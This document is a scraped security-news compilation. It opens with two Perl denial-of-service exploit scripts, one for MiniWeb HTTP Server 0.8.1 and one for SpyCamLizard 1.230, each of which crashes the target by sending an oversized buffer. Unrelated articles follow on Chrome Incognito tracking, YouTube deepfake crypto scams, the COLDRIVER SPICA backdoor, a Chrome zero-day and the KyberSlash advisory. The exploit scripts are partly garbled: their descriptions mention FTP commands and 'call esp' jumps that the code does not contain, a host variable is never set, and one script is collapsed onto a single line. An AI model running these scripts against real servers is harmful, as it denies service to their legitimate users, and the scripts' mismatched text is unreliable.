MiniWeb HTTP Server version 0.8.1 remote denial of service exploit.

#!/usr/bin/perl

use IO::Socket;

# Exploit Title: MiniWeb HTTP Server 0.8.1 - Denied of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 19 january 2024  
# Vendor Homepage:  N/A  
# Download to demo: https://drive.google.com/file/d/1AVHSlsYj5Ukw9co9M2Ql6RsqCTzbI038/view?usp=sharing    
# Notification vendor: No reported  
# Tested Version: MiniWeb HTTP Server 0.8.1 - Denied of Service (DoS)  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denied of Service (DoS)  
# Vídeo: https://www.youtube.com/watch?v=HbAy3RvHpAI

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The FTP server does not correctly handle the amount of data or bytes sent to command RNTO.  
#When authenticating to the FTP server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41" x 2038;

    my $http_req = "POST /index.html HTTP/1.1\r\n";  
    $http_req .= "Host: $ip\r\n";  
    $http_req .= "From: header-data\r\n";  
    $http_req .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";  
    $http_req .= $payload;

my $socket = IO::Socket::INET->new(  
    PeerAddr => $host,  
    PeerPort => $port,  
    Proto    => 'tcp'  
) or die "[-] Could not connect\n";

$socket->send($http_req);  
$socket->close();

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                            _/|       
                           // o\      
                           || ._)    
                           //__\     
                           )___(   

      [+] MiniWeb HTTP Server 0.8.1 - Denied of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

MiniWeb HTTP Server 0.8.1 Denial Of Service

Google wants you to know you can still be tracked when you're incognito.

Users of Chrome Canary have noticed some slight changes in the wording that Google uses for Incognito mode.

Chrome Canary is mainly intended for use by developers. It’s updated nearly daily with new features, and because it can be used alongside versions of the “normal” Chrome browser (known collectively as Chrome’s “Stable channel”), it can serve for testing and development purposes. So, these developers have access to the latest features and some of them noticed a few updates in the wording about Chrome’s Incognito mode.

Chrome’s Incognito mode aims to protect your privacy from other people who use the same device. It mitigates the risk of a spouse, roommate, or anyone on a public computer spying on your browsing habits. Private browsing mode does so by stopping your browser from saving your browsing information on your computer.

Incognito mode is also sometimes used for troubleshooting, because it ignores the installed browser extensions unless you specifically allow them to run in Incognito mode.

But, although the primary function of private browsing is to locally hide your browsing activity, Incognito mode has an interesting side effect—websites also see you as a new user when you come back in Incognito mode. This can come in handy, but should not be overrated.

You can open Incognito mode by clicking on the three dots in the right hand upper corner (More) of the browser menu and then on **New Incognito window.**

How to open an Incognito window

In the Stable channel build this is what you will see when you open an Incognito window.

> You’ve gone Incognito
> 
> Now you can browse privately, and other people who use this device won’t see your activity. However, downloads, bookmarks and reading list items will be saved.

The new warning seen in Chrome Canary when you open an incognito window says:

> “You’ve gone Incognito. Others who use this device won’t see your activity, so you can browse **more** privately. **This won’t change how data is collected by websites you visit and the services they use, including Google.**“

Image courtesy of MSPowerUser

It’s clear that Google has put more emphasis on users of the same device while moving away from the websites you visit. And it’s true that Incognito mode is primarily designed to keep your information private from other users of the same computer. It isn’t designed to keep your information private from the websites you visit, although that is sometimes a side effect. We have explained this in the past, but it’s noteworthy that Google has now added that it “won’t change how data is collected by websites you visit and the services they use, including Google.”

It’s generally assumed that the changes are tied to the fact that Google has indicated that it is ready to settle a class-action lawsuit filed in 2020 over the Incognito mode. Arising in the Northern District of California, the lawsuit accused Google of continuing to “track, collect, and identify \[users’\] browsing data in real time” even when they had opened a new Incognito window.

The judge rejected Google’s bid for summary judgement in August of 2023, pointing out that Google never revealed to its users that data collection continued even while surfing in Incognito mode.

Apparently many users, surely not our regular readers, where not aware that Incognito mode is not an anonymous mode. Websites and services, will still be able to track you and collect your data. Enabling the **Block third-party cookies** setting is more helpful.

**We don’t just report on privacy—we offer you the option to use it.**

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

 Google changes wording for Incognito browsing in Chrome 

By Waqas
Bitdefender's latest research reveals that crypto scams on YouTube are at an all-time high, with no sign of slowing down in the near future.
This is a post from HackRead.com Read the original post: YouTube Crypto Con: Scammers Rake in $600K with Deepfakes and QR Codes

Hijacked accounts, hollow promises: Stream-jacked channels lure viewers with fake Bitcoin giveaways by utilizing deepfakes of popular celebrities, including Elon Musk, Ripple’s CEO Brad Garlinghouse, and Michael J. Saylor, former managing director of MicroStrategy, among many others.

Cybersecurity researchers at Bitdefender have published their latest research, highlighting a growing trend of YouTube stream-jacking campaigns using deepfake videos for cryptocurrency theft. The latest report continues the company’s research on YouTube-related malicious scams published in October 2023.

Despite companies like McAfee launching tools such as MockingBird, designed to detect 90% of deepfake content, scammers persist in employing malicious techniques to execute crypto scams. In some instances, they have managed to successfully bypass facial recognition systems, highlighting the ongoing challenges in combating these deceptive practices.

****Stream-Jacking****

For your information, YouTube stream-jacking is a cybercrime where criminals steal accounts from popular channels using livestream pop-ups, QR codes, and malicious links. Crypto-doubling scams lure viewers into depositing their cryptocurrency into platforms, promising quick returns. Victims are lured into depositing their funds, only to find their funds disappear without a trace.

As of the first week of January 2024, there were 2.70 billion active users on YouTube. These staggering stats make the video hosting platform a lucrative target for cybercriminals and scammers.

According to Bitdefender’s research, cybercriminals are enhancing their stream-jacking attacks by creating content that mimics legitimate cryptocurrency news or announcements. 

Stream-jacking 2.0 scams target popular channels for account takeover or lure followers to mimic channels with rewards. During their research, the researchers discovered that the top three highjacked accounts to carry these scams have over 31 million subscribers, with Tesla, MicroStrategy, and SpaceX being the top brands used. Bitdefender estimates that cyber criminals have netted over $600K so far.

****Fake YouTube Channels, Real Verification!****

Bitdefender’s blog post suggests that scammers use multiple announcements and high-profile news headlines to make their scams appear credible. For instance, attackers used the “SpaceX Starship integrated flight test 2” official event to launch fake livestreams under “SpaceX Launch Starship Flight Test! Elon Musk gives update on Starship!” on compromised channels.

Deepfake content helps scammers spread fraudulent schemes on compromised channels, using cryptocurrency-related videos of famous personalities, popular conference talks, and recordings. They encourage viewers to scan a QR code and send a certain amount of crypto to be doubled. Some deep fakes are of decent quality, but the live chat section is disabled unless a selected member or subscriber has been a long-term subscriber.

There is also a rising trend of using Deepfakes in YouTube ads rather than livestreams, providing more opportunities for cybercriminals to spread scams. Account takeovers are usually enabled by compromising YouTube access tokens with stealers.

Malicious actors revamp the channel to impersonate the entity they want to impersonate, likely through automated processes. The revamping process involves changes to the channel name, handle, visibility, avatar, banner, description, links, featured channels, and anything that can help identify the original channel.

Bitdefender researchers have identified signs of artificial boosting of viewers in most livestreams. In December 2023, malicious actors began broadcasting scams targeting the Bitcoin ETF, focusing on MicroStrategy and Michael Saylor.

One such example is scammers broadcasting using looped deepfakes relying on MicroStrategy’s former CEO to participate in giveaways by scanning QR codes and following instructions. Compromised channels use variations of the official MicroStrategy logo, official banners, and playlists to boost credibility.

Deepfake YouTube ad featuring Ripple’s CEO Brad Garlinghouse – Deepfake powered livestream featuring Michael J. Saylor, former managing director of MicroStrategy giving away Bitcoin – Fake and verified SpaceX YouTube account with millions of subscribers.

The most common names after the takeover are MicroStrategy US, MicroStrategy, Microstrategy, Microstrategy US, Microstrategy Live, and Micro Strategy. Subsequently, deceptive websites began to surface, hosted on domains mimicking the company’s name or its former CEO, often incorporating symbols associated with cryptocurrencies and multipliers.

These fraudulent sites featured animated presentations showcasing multiple transactions, designed to create the illusion of live activity. It’s important to note that these animations were randomly generated and did not reflect actual transactions, serving as a misleading tactic to convey a false sense of legitimacy.

****Protect Yourself from YouTube Crytp Scams!****

Crypto scams on YouTube are a serious issue. In 2020, Apple co-founder Steve Wozniak sued YouTube over Bitcoin scams using his name. Wozniak accused YouTube and Google of enabling Bitcoin giveaway scams by failing to take action against them.

To avoid becoming a victim of stream-Jacking 2.0, be cautious of unexpected changes in content, double-check links, avoid investing based on online endorsements, and thoroughly research investment opportunities.

Additionally, Enable two-factor authentication (2FA) on YouTube accounts to prevent unauthorized access. Remember that if something seems too good to be true, it could be a scam. Don’t let a deepfake fool you into losing your crypto.

****_RELATED ARTICLES_****

1.  **Fake YouTube Android Apps Used to Distribute CapraRAT**
2.  **New YouTube phishing scam using authentic email address**
3.  **YouTube Channels Hacked, Spread Lumma Stealer Malware**
4.  **British Military’s YouTube Account Hacked to Scam Crypto Users**
5.  **Google details cookie stealer malware campaign targeting YouTubers**

YouTube Crypto Con: Scammers Rake in $600K with Deepfakes and QR Codes

There are many examples of WiFi-enabled home cameras, assistants and doorbells vulnerable to a wide range of security issues.

Thursday, January 18, 2024 14:00

Welcome to 2024! 

The Threat Source newsletter is back after our winter break. 

When I wasn’t spending my downtime chasing around my toddler, one of my main projects was to upgrade the internet connection at my house. My ISP started offering Gigabit speeds and a 60 GHz connection, which was appealing to me as someone who is always on a quest to find the best way to stream PS5 games to my Steam Deck. 

This sent me down a path of reconfiguring my home network and re-adding a bunch of devices to a new network. And even though this sounds like a totally basic skill for anyone who works in cybersecurity, it was a big deal for me to set up a separate IoT-only network. 

Many readers may have even gotten a new IoT device for a holiday gift. This mobile projector was featured on several “Top Gifts of 2023” lists I was looking at in December, and there are always the slam dunk gifts of a new home AI assistant like Google Home or the Amazon Echo Show to control all things “smart” in your home. 

And we all know that, by being connected to the internet, many of these IoT devices are going to be vulnerable to adversaries. Last week, researchers found a network-connected torque wrench used in many industrial environments could be infected with ransomware.  

There are many examples of WiFi-enabled home cameras, assistants and doorbells vulnerable to a wide range of security issues, so I don’t think I need to run down those dangers in this newsletter. I wanted to take this space to share a few reminders and best practices of how to best set up these devices and manage them. This is a topic I covered previously in video format a few years ago, but I’m sure much of the UI/UX in this tutorial has changed since then, and I feel like I learned quite a bit from “YouTube University” over the past week or so in my own journey. 

*   Use network mapping software to track which devices connect to your network using what communication methods. NetworkMaps is a free, open-source option that I used when I was taking cybersecurity courses online.  
*   Create an IoT-specific network. This was super easy for me to do with the Gigabit-enabled router my ISP sent me, but I set up a network specifically for these devices to connect to (like my baby monitor, smart TVs, etc.) with a completely different network name and password from my “main” network. This keeps these devices segmented so that, if a bad guy is lurking, they stay on that IoT-specific network that doesn’t talk to your more sensitive devices like a work laptop. 
*   Make sure your router’s firewall is enabled, disable WPS and enable the WPA2 or WPA3 security protocol. 
*   Immediately change the default usernames and passwords that come with any new WiFi-connected device you’re setting up. 
*   Any home routers or IoT devices could point to OpenDNS servers for an additional (and free!) layer of security.
*   Disable any additional features or data-sharing you feel like you don’t need. The prime example of this for me is Amazon Sidewalk, the community network that allows Amazon devices to talk to one another and send alerts to users about various goings-on in their respective communities. The main drawback for me is that it allows your neighbors to pull off just a little of your internet bandwidth for their connected devices, too, and opens a whole slew of privacy concerns. 

**The one big thing **

Cisco Talos recently worked with fellow security company Avast to release a new version of the decryptor for the Babuk ransomware. Our researchers obtained executable code capable of decrypting files affected by the Babuk Tortilla ransomware variant, allowing Talos to extract and share the private decryption key used by the threat actor in its latest variant. 

**Why do I care? **

Babuk is one of the most prevalent ransomware families in the wild right now, so any additional resources for victims to potentially recover faster, and for free, is good news. And Dutch Police, acting on threat intelligence supplied by Talos, identified, apprehended and the Dutch Prosecution Office prosecuted the threat actor behind Babuk Toa bad guy is lurkingtilla operations, demonstrating the power of cooperation between law enforcement agencies and commercial security organizations such as Talos and Avast.  

**So now what? **

The newest version of the decryptor is now available through No More Ransom, or directly on Avast’s website. Continued action from law enforcement to track down, apprehend and charge the operators behind ransomware is one of the many important steps we can take as a society and security community to reduce the prevalence of ransomware. 

**Top security headlines of the week **

**Security researchers are warning of actively exploited vulnerabilities in the Ivanti Connect Secure VPN** that, as of Wednesday, still did not have a patch available. The vulnerabilities are an authentication bypass flaw (CVE-2023-46805) and a command injection issue (CVE-2024-21887). An adversary could chain these vulnerabilities to execute arbitrary commands on the targeted appliance. Incident response firm Volexity said earlier this week that government agencies and military branches across the globe, as well as several Fortune 500 private companies. Chinese state-sponsored actor UTA0178 is suspected to be behind the exploitation of these vulnerabilities, some dating back to December. Ivanti says it is still developing patches for these issues, one of which may not be available until mid-February. In the meantime, users should follow the mitigation steps outlined by Ivanti, and implement a new scanner that can detect exploitation attempts. (DarkReading, SecurityWeek) 

**Britain’s national library is working to restore its online services 11 weeks after a cyber attack, though a full recovery may take until the end of the year.** The British Library started restoring read-only versions of its online catalog last week, including records of printed and rare books, maps, journals and music scores. The Rhysida ransomware group initially took credit for the attack in October 2023, claiming it was offering personal information for sale on the dark web. The library eventually confirmed that some employee data had been stolen in the attack, and it had to temporarily take its entire catalog offline. The attack also held up the payment system for which the library rewards authors and creators each time one of their works is checked out. (The Guardian, The New York Times) 

**Chinese government officials have apparently found a way to de-anonymize Apple AirDrop users to track anyone sharing content that’s outlawed by the country.** AirDrop is normally encrypted, and has been used previously to share messages, content and art with other iPhone users in public that is against the ruling Communist Party in China. But the Beijing municipal government's justice bureau says China-backed experts have found a way to carry out a complex encryption attack to reveal the original sender of the messages and prosecute them. In November 2022, Apple updated AirDrop settings so users in China could only opt-in to receive files from unknown contacts during a 10-minute window before it automatically shut off. The feature did not previously have a time limit. Translations of government statements indicate that the method involves what are known as “rainbow tables” to defeat the measures AirDrop has in place to obfuscate users' phone numbers and email addresses. (Ars Technica, CBS) 

**Can’t get enough Talos? **

*   Beers with Talos Ep. #142: Talos Speed Dating (the episode we never set out to make but did anyway) 
*   Intellexa and Cytrox: From fixer-upper to Intel Agency-grade spyware 
*   Microsoft starts off new year with relatively light Patch Tuesday, no zero-days 
*   Video series discussing the major threat actor trends from 2023 
*   Year in Malware 2023: Recapping the major cybersecurity stories of the past year 

**Most prevalent malware files from Talos telemetry over the past week  **

**SHA 256:** b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31   
**MD5:** 2fb86be791b4bb4389e55df0fec04eb7   
**Typical Filename:** KMSAuto Net.exe   
**Claimed Product:** KMSAuto Net   
**Detection Name:** W32.File.MalParent 

**SHA 256:** 36efad0617db0d45de00cc4f3cf49af7c2d6b5b15ca456d13703b5d366c58431   
**MD5:** 147c7241371d840787f388e202f4fdc1   
**Typical Filename:** EKSPLORASI.EXE   
**Claimed Product:** N/A    
**Detection Name:** Win32.Generic.497796 

**SHA 256:** 1fa0222e5ae2b891fa9c2dad1f63a9b26901d825dc6d6b9dcc6258a985f4f9ab   
**MD5:** 4c648967aeac81b18b53a3cb357120f4   
**Typical Filename:** yypnexwqivdpvdeakbmmd.exe   
**Claimed Product:** N/A    
**Detection Name:** Win.Dropper.Scar::1201 

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91    
**MD5:** 7bdbd180c081fa63ca94f9c22c457376   
**Typical Filename:** c0dwjdi6a.dll   
**Claimed Product:** N/A    
**Detection Name:** Trojan.GenericKD.33515991 

**SHA 256:** 39b0d4bad98713924775595834f1e07598a12c2622977578739222e09766066c   
**MD5:** a543017b4fa809e9f6b7251e7c14a5b0   
**Typical Filename:** a543017b4fa809e9f6b7251e7c14a5b0   
**Claimed Product:** N/A     
**Detection Name:** Auto.39B0D4BAD9.232061.in07.Talos

What to do with that fancy new internet-connected device you got as a holiday gift

SpyCamLizard version 1.230 remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET;# Exploit Title: SpyCamLizard 1.230 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 18 january 2024# Vendor Homepage: http://www.spycamlizard.com# Download to demo: https://drive.google.com/file/d/1daFgHh0VzbkDzIp41-imZbPoc6ETZDq2/view?usp=sharing# Notification vendor: Yes reported# Tested Version: SpyCamLizard 1.230 - Denial of Service (DoS)# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)# Vídeo: https://youtu.be/Ksg8L-ZX2Us#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The SpyCamLizard does not correctly handle the amount of data or bytes sent.#When authenticating to the SpyCamLizard with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";print "[+] Connecting to $ip:$port\n";my $exploit = "x41" x 3000;my $httpsocket = IO::Socket::INET->new(    PeerAddr => $host,    PeerPort => $port,    Proto    => "tcp",);$httpsocket->send("GET " . $exploit . " HTTP/1.0\r\n\r\n");$httpsocket->close();    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] SpyCamLizard 1.230 - Denial of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }

SpyCamLizard 1.230 Denial Of Service

The Russia-linked threat actor known as COLDRIVER has been observed evolving its tradecraft to go beyond credential harvesting to deliver its first-ever custom malware written in the Rust programming language.
Google's Threat Analysis Group (TAG), which shared details of the latest activity, said the attack chains leverage PDFs as decoy documents to trigger the infection sequence. The lures are

The Russia-linked threat actor known as **COLDRIVER** has been observed evolving its tradecraft to go beyond credential harvesting to deliver its first-ever custom malware written in the Rust programming language.

Google's Threat Analysis Group (TAG), which shared details of the latest activity, said the attack chains leverage PDFs as decoy documents to trigger the infection sequence. The lures are sent from impersonation accounts.

COLDRIVER, also known by the names Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), Gossamer Bear, Star Blizzard (formerly SEABORGIUM), TA446, and UNC4057, is known to be active since 2019, targeting a wide range of sectors.

This includes academia, defense, governmental organizations, NGOs, think tanks, political outfits, and, recently, defense-industrial targets and energy facilities.

"Targets in the U.K. and U.S. appear to have been most affected by Star Blizzard activity, however activity has also been observed against targets in other NATO countries, and countries neighboring Russia," the U.S. government disclosed last month.

Spear-phishing campaigns mounted by the group are designed to engage and build trust with the prospective victims with the ultimate goal of sharing bogus sign-in pages in order to harvest their credentials and gain access to the accounts.

Microsoft, in an analysis of the COLDRIVER's tactics, called out its use of server-side scripts to prevent automated scanning of the actor-controlled infrastructure and determine targets of interest, before redirecting them to the phishing landing pages.

The latest findings from Google TAG show that the threat actor has been using benign PDF documents as a starting point as far back as November 2022 to entice the targets into opening the files.

"COLDRIVER presents these documents as a new op-ed or other type of article that the impersonation account is looking to publish, asking for feedback from the target," the tech giant said. "When the user opens the benign PDF, the text appears encrypted."

In the event the recipient responds to the message stating they cannot read the document, the threat actor responds with a link to a purported decryption tool ("Proton-decrypter.exe") hosted on a cloud storage service.

The choice of the name "Proton-decrypter.exe" is notable because Microsoft had previously revealed that the adversary predominantly uses Proton Drive to send the PDF lures through the phishing messages.

In reality, the decryptor is a backdoor named SPICA that grants COLDRIVER covert access to the machine, while simultaneously displaying a decoy document to keep up the ruse.

Prior findings from WithSecure (formerly F-Secure) have revealed the threat actor's use of a lightweight backdoor called Scout, a malware tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform, as part of phishing campaigns observed in early 2016.

Scout is "intended to be used as an initial reconnaissance tool to gather basic system information and screenshots from a compromised computer, as well as enable the installation of additional malware," the Finnish cybersecurity company noted at the time.

SPICA, which is the first custom malware developed and used by COLDRIVER, uses JSON over WebSockets for command-and-control (C2), facilitating the execution of arbitrary shell commands, theft of cookies from web browsers, uploading and downloading files, and enumerating and exfiltrating files. Persistence is achieved by means of a scheduled task.

"Once executed, SPICA decodes an embedded PDF, writes it to disk, and opens it as a decoy for the user," Google TAG said. "In the background, it establishes persistence and starts the main C2 loop, waiting for commands to execute."

There is evidence to suggest that the nation-state actor's use of the implant goes back to November 2022, with the cybersecurity arm multiple variants of the "encrypted" PDF lure, indicating that there could be different versions of SPICA to to match the lure document sent to targets.

As part of its efforts to disrupt the campaign and prevent further exploitation, Google TAG said it added all known websites, domains, and files associated with the hacking crew to Safe Browsing blocklists.

The development comes over a month after the U.K. and the U.S. governments sanctioned two Russian members of COLDRIVER, Ruslan Aleksandrovich Peretyatko and Andrey Stanislavovich Korinets, for their involvement in conducting the spear-phishing operations.

French cybersecurity firm Sekoia has since publicized links between Korinets and known infrastructure used by the group, which comprises dozens of phishing domains and multiple servers.

  
"Calisto contributes to Russian intelligence efforts to support Moscow's strategic interests," the company said. "It seems that domain registration was one of \[Korinets'\] main skills, plausibly used by Russian intelligence, either directly or through a contractor relationship."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Russian COLDRIVER Hackers Expand Beyond Phishing with Custom Malware

Google has issued a security update for the Chrome browser that includes a patch for one zero-day vulnerability.

Google has released an update for Chrome which includes four security fixes, including one for a vulnerability that has reportedly already been exploited.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerability in this patch. My preferred method is to have Chrome open the page _chrome://settings/help_ which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete, and for you to be safe from those vulnerabilities.

After the update, the version should be 120.0.6099.224, or later

**Technical details**

Google never gives out a lot of information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix. However, from the update page we can learn a few things.

Three vulnerabilities found by external researchers all lie in Chrome’s V8 JavaScript engine.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The three V8 vulnerabilities are listed as:

CVE-2024-0517: an out of bounds write in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

An out-of-bounds write can occur when a program writes outside the bounds of an allocated area of memory, potentially leading to a crash or arbitrary code execution. This can happen when the size of the data written is larger than the size of the allocated memory area, when the data is written to an incorrect location within the memory area, or when the program incorrectly calculates the size or location of the data to be written.

CVE-2024-0518: a type confusion in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

Type confusion vulnerabilities are programming flaws that happen when a piece of code doesn’t verify the type of object that is passed to it before using it. Type confusion can allow an attacker to feed function pointers or data into the wrong piece of code. In this case, it can lead to heap corruption.

Heap corruption occurs when a program modifies the contents of a memory location outside of the memory allocated to the program. The heap is an area of memory made available for use by the program. The program can request blocks of memory for its use within the heap.

CVE-2024-0519: out of bounds memory access in V8 in Google Chrome prior to 120.0.6099.224 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

An out-of-bounds memory access means that the software has access to data past the end, or before the beginning, of the intended buffer.

Google notes that it is aware of reports that an exploit for CVE-2024-0519 exists in the wild.

V8 is an open-source JavaScript and WebAssembly engine developed by the Chromium Project for Chromium and Google Chrome web browsers, so users of other Chromium based browsers, like Microsoft Edge, can expect to see similar updates in the near future.

Microsoft says it’s actively working on releasing a security patch and added:

> “It’s worth highlighting that Microsoft Edge’s enhanced security mode feature mitigates this vulnerability. You can opt-in into this security feature and have peace of mind that Microsoft Edge is protecting you against this exploit.”

Use the following steps to configure enhanced security in Edge.

1.  In Microsoft Edge, go to **Settings and more** > **Settings** > **Privacy, search, and services**.
2.  Under **Security**, verify that **Enhance your security on the web** is enabled.
3.  Select the option that’s best for your browsing.

The following toggle settings are available:

*   Toggle Off (Default): Feature is turned off
*   Toggle On – Balanced (Recommended): Microsoft Edge will apply added security protections when users visit unfamiliar sites but bypass those protections for commonly visited sites. This combination provides a practical level of protection against attackers while preserving the user experience for a user’s usual tasks on the web.
*   Toggle On – Strict: Microsoft Edge will apply added security protections for all the sites a user visits. Users may report some challenges accomplishing their usual tasks.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Update Chrome! Google patches actively exploited zero-day vulnerability 

### Impact
On some platforms, when an attacker can time decapsulation of Kyber on forged cipher texts, they could possibly learn (parts of) the secret key.

### Patches
Patched in https://github.com/kudelskisecurity/crystals-go/pull/21

### Note
This library was written as part of a MsC student project in the Cybersecurity Team at Kudelski Security. It is not actively maintained anymore. It is only intended for research and testing. We discourage its use in any production environment. Kudelski Security does not use this library as part of their commercial offers or product. This has now been clarified on the project's README.

### References
https://groups.google.com/a/list.nist.gov/g/pqc-forum/c/ldX0ThYJuBo
http://kyberslash.cr.yp.to/

**Package**

gomod github.com/kudelskisecurity/crystals-go (Go)

**Affected versions**

< 0.0.0-20240116172146-2a6ca2d4e64d

**Patched versions**

0.0.0-20240116172146-2a6ca2d4e64d

**Description**

**Impact**

On some platforms, when an attacker can time decapsulation of Kyber on forged cipher texts, they could possibly learn (parts of) the secret key.

**Patches**

Patched in kudelskisecurity/crystals-go#21

**Note**

This library was written as part of a MsC student project in the Cybersecurity Team at Kudelski Security. It is not actively maintained anymore. It is only intended for research and testing. We discourage its use in any production environment. Kudelski Security does not use this library as part of their commercial offers or product. This has now been clarified on the project's README.

**References**

https://groups.google.com/a/list.nist.gov/g/pqc-forum/c/ldX0ThYJuBo  
http://kyberslash.cr.yp.to/

**References**

*   GHSA-f6jh-hvg2-9525
*   kudelskisecurity/crystals-go#19
*   kudelskisecurity/crystals-go#20
*   kudelskisecurity/crystals-go#21
*   kudelskisecurity/crystals-go@2a6ca2d
*   https://kyberslash.cr.yp.to/faq

 tgkudelski published to kudelskisecurity/crystals-go

Jan 16, 2024

Published to the GitHub Advisory Database

Jan 17, 2024

Reviewed

Jan 17, 2024

GHSA-f6jh-hvg2-9525: crystals-go vulnerable to KyberSlash (timing side-channel attack for Kyber)

By Waqas
Is Google Incognito mode really private? Well, the answer is no. Why? Let's take a closer look...
This is a post from HackRead.com Read the original post: Google Incognito Mode: New Disclaimer Reveals Data Tracking

Google’s New Disclaimer Confuses Users with Data Collection Admission – It All Happened After the Company Had to Face a Whopping $5 Billion Lawsuit.

For years, “Go incognito” has been the whispered mantra for those seeking online privacy. Google Chrome’s private browsing mode promised a cloak of anonymity, letting users roam the web free from watchful eyes. But a recent lawsuit and a quiet update by Google have cast a shadow over this digital haven, raising questions about its effectiveness and the company’s commitment to user privacy.

****Google’s New Disclaimer****

Google has updated its Incognito mode ‘disclaimer’ to reflect its data collection practices, which were previously unnoticed and got the company into legal trouble. The Chrome Incognito mode disclaimer initially stated users could “browse privately,” but the new version claims more privacy.

The update was added to the Chrome Canary build, a version (122.0.6251.0) created for developers that includes experimental releases and is updated daily. The Incognito mode disclaimer previously stated:

“Now you can browse privately, and other people who use this device won’t see your activity. However, downloads, bookmarks, and reading list items will be saved.”

After the update in Canary, the disclaimer states the following:

“Others who use this device won’t see your activity, so you can browse more privately. This won’t change how data is collected by websites you visit and the services they use, including Google. Downloads, bookmarks, and reading list items will be saved.”

Old and New disclaimers (Screenshot credit: Hackread.com)

Both versions acknowledge that web activity may still be visible to sites, but the newer version informs users that websites, including Google, continue to collect browsing data in Incognito tabs, allowing tracking of Incognito users and Google users using Google services like Ad Manager and Analytics. Judge Yvonne Gonzalez Rogers cited this as a reason for ruling against Google’s motion for summary judgment in a privacy lawsuit.

For your information, in 2020, Google faced a $5 billion class action lawsuit for collecting user data through its services in Incognito Mode. The lawsuit alleged that Google tracked sensitive user data, such as browsing history, device data, and IP addresses even when users believed they were surfing privately.

Google initially dismissed the allegations, but US District Judge Lucy Koh disagreed, stating that Google never explicitly informed users about its continued data collection. The company then stated that the websites collect data in this mode, but the disclaimer does not mention it.

Google redesigned its Incognito mode pages, but this has not been enough. The company, thus, had to agree to pay $5 billion in settlement in December 2023, expected to be presented for court approval by February 24, 2024. It also reworded the disclaimer and changed everything else except the first paragraph to appear more transparent about data collection practices in Incognito mode.

Google has added disclaimers to Chrome Canary on Android, Windows, and other platforms when users open a new incognito tab/window. It is worth noting that Incognito mode is not anonymous, and third-party cookie tracking prevention is enabled by default to protect user activity. Still, the case highlights the need for more transparent data collection practices, particularly in sensitive features like Incognito mode, by tech giants like Google.

For insights into this, we reached out to John Bambenek, President at Bambenek Consulting. “Incognito mode, and its equivalent, to other browsers, has never offered much more privacy protection than people hiding their web viewing habits from their parents or partners,” John argued.

“This lawsuit highlights that this mode doesn’t offer much in the way of privacy at all. While organizations were concerned about what third parties might be collecting about their employees or their workplace, they should be focusing on migrating to privacy-centric, browsers, and using browsing plug-ins that prevent websites from collecting data in the first place,” he advised.

**What Does All This Mean?**

So, what does this mean for the web-weary wanderer? First, a dose of realism: incognito mode is not magic. Embrace its limitations, and consider alternative tools for truly sensitive web journeys. Second, demand more transparency. Google’s quiet update, while a step in the right direction, pales in comparison to the need for clear, comprehensive explanations of data collection practices.

Ultimately, the battle for online privacy is far from over. Google’s incognito update is a small victory, a flicker of light in the ever-growing digital surveillance landscape. But the fight for truly private browsing, for a web where anonymity isn’t an illusion, continues.
